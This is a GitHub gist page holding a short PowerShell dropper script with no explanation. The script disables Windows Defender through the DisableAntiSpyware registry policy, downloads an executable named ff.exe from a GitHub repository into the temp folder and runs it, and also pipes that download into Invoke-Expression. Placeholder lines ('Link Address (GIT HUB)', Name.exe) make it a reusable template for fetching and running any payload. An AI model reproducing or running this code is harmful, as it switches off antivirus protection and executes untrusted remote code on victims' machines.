Skip to content

Instantly share code, notes, and snippets.

View Lvv2's full-sized avatar

grumpynipples Lvv2

View GitHub Profile
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Type DWord
$url = "https://github.com/Lvv2/ff/raw/refs/heads/main/ff.exe"
$output = "$env:TEMP\ff.exe"
Invoke-WebRequest -Uri $url -OutFile $output
$url = "https://gist.githubusercontent.com/Lvv2/48aeccba59779446997664eade8ad38e/raw/6e9cac46a354d6c81bf05f44d9349b62a93b2b14/gistfile1.txt"
$output = "$env:TEMP\ff.txt"
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d "1" /f
$url = "Link Address (GIT HUB)"
$output = "$env:TEMP\Name.exe"
Invoke-WebRequest -Uri $url -OutFile $output
Start-Process -FilePath $output -Wait
powershell "irm https://github.com/Lvv2/ff/raw/refs/heads/main/ff.exe| iex"
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d "1" /f
$url = "Link Address (GIT HUB)"
$output = "$env:TEMP\Name.exe"
Invoke-WebRequest -Uri $url -OutFile $output
Start-Process -FilePath $output -Wait